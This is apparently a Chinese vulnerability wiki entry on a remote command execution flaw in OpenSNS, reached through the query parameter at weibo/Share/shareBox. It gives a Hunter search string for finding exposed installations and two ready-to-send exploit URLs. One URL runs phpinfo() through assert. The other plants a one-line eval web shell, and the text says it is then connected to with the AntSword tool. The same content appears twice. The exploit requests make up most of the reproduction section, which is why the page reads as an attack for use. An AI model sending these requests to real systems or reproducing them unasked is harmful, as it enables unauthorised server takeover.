fofamini-wiki

登录白背景

源码

OpenSNS远程命令执行漏洞

一、漏洞简介

opensns是基于tp3开发的，仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。

二、影响版本

opensns

三、资产测绘

hunterapp.name="OpenSNS"
特征

四、漏洞复现

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

使用一句话木马并采用蚁剑连接

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=@eval($_POST[Haaa])

原文: https://www.yuque.com/xiaokp7/ocvun2/hwb6ygcvv0wr33zn

# OpenSNS远程命令执行漏洞

# 一、漏洞简介
opensns是基于tp3开发的，仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。

# 二、影响版本

- opensns

# 三、资产测绘

- hunter`app.name="OpenSNS"`
- 特征

![image.png](./img/uex9ayVsYmLQb9il/1696161513427-8e1cc9ba-4df3-4b49-877f-7d8c33c7e877-251937.png)

# 四、漏洞复现
```
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()
```
![image.png](./img/uex9ayVsYmLQb9il/1696161543740-808c5727-88f6-49dc-8597-af148b3a5a11-232510.png)使用一句话木马并采用蚁剑连接
```
/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=@eval($_POST[Haaa])
```
![image.png](./img/uex9ayVsYmLQb9il/1696161664327-e325ab86-baa6-45ad-9c62-c5a6478150ad-212045.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/hwb6ygcvv0wr33zn>